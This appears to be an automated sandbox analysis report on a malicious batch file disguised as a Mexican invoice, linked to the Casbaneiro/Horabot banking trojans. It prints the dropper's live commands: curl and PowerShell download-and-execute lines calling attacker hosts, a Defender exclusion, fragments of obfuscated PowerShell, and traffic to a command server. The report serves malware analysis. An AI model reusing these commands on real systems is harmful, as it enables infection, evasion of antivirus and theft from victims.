                                                                                                      Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 26455 100 26455 0 0 26455 0 0:00:01 0:00:01 --:--:-- 26038..
                                                                                                      File type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Entropy (8bit):5.36691612016954
                                                                                                      TrID:
                                                                                                        File name:Factura-2410-CFDI.bat
                                                                                                        File size:1'015 bytes
                                                                                                        MD5:2cba1f2ecba7411565c62f74f8ff095c
                                                                                                        SHA1:e69a4fccd578e235fa31c3edc9d8b4a6974faeb0
                                                                                                        SHA256:1a17e8bd86fbe8d1fb1aedce6182de434a3a8e71488f6d285651c168d03242eb
                                                                                                        SHA512:3bd419ada4704e59b543d495d1718dbc4a146562a47667c60adea11c0c14d4ff1c88f38f12ba112106532ed59eea23a69dfc0d63b9d2154e77d3917cc1bc84d6
                                                                                                        SSDEEP:24:QXKLdVVFbZd8d3UQ3WFYHW9ch6WFYHWI2:zLXIdkAWi29ch6Wi2I2
                                                                                                        TLSH:7A11213291CA933EFD020C2FD0B5D846DB5FC847B34992C1B13A1F18718A698829F1C6
                                                                                                        File Content Preview:@echo off..curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" ..powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\User
                                                                                                        Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T00:21:47.576164+0200 | 2841717 | ETPRO MALWARE PowerShell/TrojanDownloader Casbaneiro CnC | 1 | 192.168.11.20 | 49750 | 62.72.3.210 | 80 | TCP
2024-10-27T00:21:58.065441+0200 | 2052642 | ET MALWARE Horabot Payload Inbound | 1 | 93.127.200.211 | 443 | 192.168.11.20 | 49752 | TCP
2024-10-27T00:21:58.065441+0200 | 2834717 | ETPRO MALWARE PowerShell Inbound with Antivirus Enumeration and Downloading Capabilities | 1 | 93.127.200.211 | 443 | 192.168.11.20 | 49752 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 00:21:56.938231945 CEST | 52917 | 53 | 192.168.11.20 | 1.1.1.1
Oct 27, 2024 00:21:57.304321051 CEST | 53 | 52917 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 00:21:56.938231945 CEST | 192.168.11.20 | 1.1.1.1 | 0x687d | Standard query (0) | fsnat.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 00:21:57.304321051 CEST | 1.1.1.1 | 192.168.11.20 | 0x687d | No error (0) | fsnat.shop | | 93.127.200.211 | A (IP address) | IN (0x0001) | false
                                                                                                        • fsnat.shop
                                                                                                        • 62.72.3.210
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.11.204975062.72.3.210806872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 27, 2024 00:21:46.896555901 CEST167OUTPOST /ldht/index.php HTTP/1.1
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Host: 62.72.3.210
                                                                                                        Content-Length: 94
                                                                                                        Expect: 100-continue
                                                                                                        Connection: Keep-Alive
Oct 27, 2024 00:21:47.047605991 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 00:21:47.051057100 CEST | 94 | OUT | Data Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 36
                                                                                                        Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 64-Bit CPU
Oct 27, 2024 00:21:47.884037018 CEST | 209 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Sat, 26 Oct 2024 22:21:46 GMT
                                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                                        Content-Length: 6
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 42 72 61 7a 69 6c
                                                                                                        Data Ascii: Brazil


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49752 | 93.127.200.211 | 443 | 7380 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 22:21:57 UTC | 77 | OUT | GET /a/08/150822/up/up HTTP/1.1
                                                                                                        Host: fsnat.shop
                                                                                                        Connection: Keep-Alive
2024-10-26 22:21:57 UTC | 323 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Sat, 26 Oct 2024 22:21:57 GMT
                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: upgrade-insecure-requests
                                                                                                        Last-Modified: Sat, 19 Oct 2024 12:57:29 GMT
                                                                                                        ETag: "675b-624d3f649e040"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 26459
                                                                                                        Connection: close
2024-10-26 22:21:57 UTC | 7869 | IN
                                                                                                        Data Ascii: function ____///////// { [cmdletBinding()] param ( [string]$ComputerName = "$env:computername" , $Credential ) BEGIN { $wmiQuery = "SELECT * FROM AntiVirusProduct" } PROCESS { $Anti
2024-10-26 22:21:58 UTC | 8000 | IN
                                                                                                        Data Ascii: __||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1foreach($n in ${__|||||||||||||//////\\\\\________________}) {${_|||||||||||||//////\\\\\________________} += $n}foreach ($
2024-10-26 22:21:58 UTC | 8000 | IN
                                                                                                        Data Ascii: ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}" ${/=\/\__/=\/=\/=\_}.Arguments =
2024-10-26 22:21:58 UTC | 2590 | IN
                                                                                                        Data Ascii: \\___\\\\/|_}.at") -Path ("${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\c${_tx_}")Rename-Item -NewName ("${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.mdat") -Path ("${_\\////////////////////



                                                                                                        Target ID:0
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\curl.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
                                                                                                        Imagebase:0x7ff6eb9c0000
                                                                                                        File size:421'376 bytes
                                                                                                        MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:18:21:23
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell.exe -nop -win 1 -
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\_kjfech8_V\_kjfech8_Vi7.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\_kjfech8_V\_kjfech8_Vi7.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:15'936 bytes
                                                                                                        MD5 hash:4AFCAB972E98ECBF855F915B2739F508
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Target ID:10
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:11
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\_kjfech8_V\_kjfech8_Vi7.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\_kjfech8_V\_kjfech8_Vi7.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:15'936 bytes
                                                                                                        MD5 hash:4AFCAB972E98ECBF855F915B2739F508
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
                                                                                                        Imagebase:0xaf0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:14
                                                                                                        Start time:18:22:04
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:17
                                                                                                        Start time:18:22:04
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
                                                                                                        Imagebase:0x2d0000
                                                                                                        File size:482'640 bytes
                                                                                                        MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:18
                                                                                                        Start time:18:22:05
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        Imagebase:0x7ff6a4320000
                                                                                                        File size:496'640 bytes
                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:19
                                                                                                        Start time:18:22:33
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\shutdown.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\shutdown.exe" /r /t 10
                                                                                                        Imagebase:0x7ff652020000
                                                                                                        File size:28'160 bytes
                                                                                                        MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:20
                                                                                                        Start time:18:22:59
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCDF58
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCDF63
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6FDCDF7E
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCDF8B
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFA7
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFC4
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFD1
                                                                                                            • Part of subcall function 6FDCD485: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,6FDCD5C5,?), ref: 6FDCD4AA
                                                                                                            • Part of subcall function 6FDCD485: FileTimeToSystemTime.KERNEL32(?,6FDCD5C5,?,?,6FDCD5C5,?), ref: 6FDCD4BC
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE035
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE04D
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE074
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE07F
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE090
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE09B
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE0AA
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE0B4
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0D0
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0EC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0F9
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE15D
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE172
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE19B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE1A6
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 6FDCE1CC
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE1DD
                                                                                                          • _errno.MSVCR100 ref: 6FDCE1F9
                                                                                                          • _errno.MSVCR100 ref: 6FDCE206
                                                                                                          • _errno.MSVCR100 ref: 6FDCE213
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?,00000000), ref: 6FDCE290
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 6FDCE2AD
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE2D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE2E2
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE2F2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE2FD
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE30C
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE316
                                                                                                          • _errno.MSVCR100 ref: 6FDCE332
                                                                                                          • _errno.MSVCR100 ref: 6FDCE34E
                                                                                                          • _errno.MSVCR100 ref: 6FDCE35B
                                                                                                            • Part of subcall function 6FDCD9BC: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,6FDCD808,?,00000000), ref: 6FDCD9E1
                                                                                                            • Part of subcall function 6FDCD9BC: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,6FDCD808,?,00000000), ref: 6FDCD9F3
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE3D7
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE3EC
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE415
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE420
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 6FDCE43B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE448
                                                                                                          • _errno.MSVCR100 ref: 6FDCE464
                                                                                                          • _errno.MSVCR100 ref: 6FDCE481
                                                                                                          • _errno.MSVCR100 ref: 6FDCE48E
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE4FB
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE513
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE53A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE545
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE556
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE561
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE570
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE57A
                                                                                                          • _errno.MSVCR100 ref: 6FDCE596
                                                                                                          • _errno.MSVCR100 ref: 6FDCE5B2
                                                                                                          • _errno.MSVCR100 ref: 6FDCE5BF
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE62C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE641
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE66A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE675
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 6FDCE69B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE6AC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6C8
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6D5
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6E2
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?,00000000), ref: 6FDCE756
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 6FDCE773
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE79D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE7A8
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE7B8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE7C3
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE7D2
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE7DC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE7F8
                                                                                                          • _errno.MSVCR100 ref: 6FDCE814
                                                                                                          • _errno.MSVCR100 ref: 6FDCE821
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE894
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE8A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$File$_invalid_parameter_noinfo$ErrorFindLastTime_invoke_watsonwcscpy_s$FirstNext$LocalSystem$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1405311575-0
                                                                                                          • Opcode ID: 339766c4a845259cf0957da36fb5894242d679fe679fa732184e63be4be5ff8d
                                                                                                          • Instruction ID: 6d87e56a841ffb15923eda408c6a93fbef97f702ee1d6da95546f34890e5c64f
                                                                                                          • Opcode Fuzzy Hash: 339766c4a845259cf0957da36fb5894242d679fe679fa732184e63be4be5ff8d
                                                                                                          • Instruction Fuzzy Hash: E442D7B1940718DBC761AFB8CC89A9EB7F8AF45314F10475AE465D72C0DB34F6848BA2
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDEE857
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDEE862
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDEE8AC
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDEE8E9
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDEE97C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswctype$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: *$F$F$I$L$N$c$c$c$c$g$h$i$l$n$n$o$s$w${${
                                                                                                          • API String ID: 4126605999-2618222358
                                                                                                          • Opcode ID: b9db0cb822d72baa20d5afc4a90692ecd5085a23562b518a45f640b3a1af82f2
                                                                                                          • Instruction ID: 1ceca84f80cfe91d5043a8ce0b46e4b62a2a2bf6d174936d686ce51a6e5314c1
                                                                                                          • Opcode Fuzzy Hash: b9db0cb822d72baa20d5afc4a90692ecd5085a23562b518a45f640b3a1af82f2
                                                                                                          • Instruction Fuzzy Hash: EE92AC75D0536ACAEBA59B24DC88BEDB7B4AF05314F1001EBD458AA1A1DB70BEC1CF50
                                                                                                          APIs
